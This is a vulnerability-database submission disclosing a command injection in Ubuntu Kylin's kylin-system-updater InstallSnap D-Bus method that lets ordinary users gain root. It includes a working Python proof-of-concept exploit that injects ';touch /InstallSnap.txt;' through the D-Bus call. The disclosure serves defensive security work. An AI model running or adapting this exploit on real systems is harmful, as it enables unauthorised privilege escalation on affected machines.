| Title | UbuntuKylin OS privilege escalation vulnerability |
|---|
| Description | Describe
There is a command injection vulnerability in the InstallSnap function in the update component (Kylin-system-updater) of the Ubuntu Kylin OS system. Any user can call the vulnerability, causing ordinary users to obtain root privileges through the vulnerability.
Hazard level
High
Affected version
Ubuntukylin:kylin-system-updater <= 1.4.20kord
POC&&EXP
ISO Download:
https://www.ubuntukylin.com/downloads/download.php?id=91
exp.py
```
import dbus
import os
payload = ';touch /InstallSnap.txt;'
bus=dbus.SystemBus()
xattr=bus.get_object('com.kylin.systemupgrade','/com/kylin/systemupgrade')
iface=dbus.Interface(xattr,dbus_interface='com.kylin.systemupgrade.interface')
prop=iface.InstallSnap("{}".format(payload))
print(prop)
os.system("ls -l /InstallSnap.txt")
``` |
|---|
| Source | ⚠️ https://github.com/cn-lwj/vuldb/blob/master/kylin-system-updater_vuln.md |
|---|
| User | cn-lwj (UID 42196) |
|---|
| Submission | 03/03/2023 10:53 (3 years ago) |
|---|
| Moderation | 03/08/2023 19:06 (5 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 222600 [kylin-system-updater up to 1.4.20kord on Ubuntu Kylin Update InstallSnap command injection] |
|---|
| Points | 20 |
|---|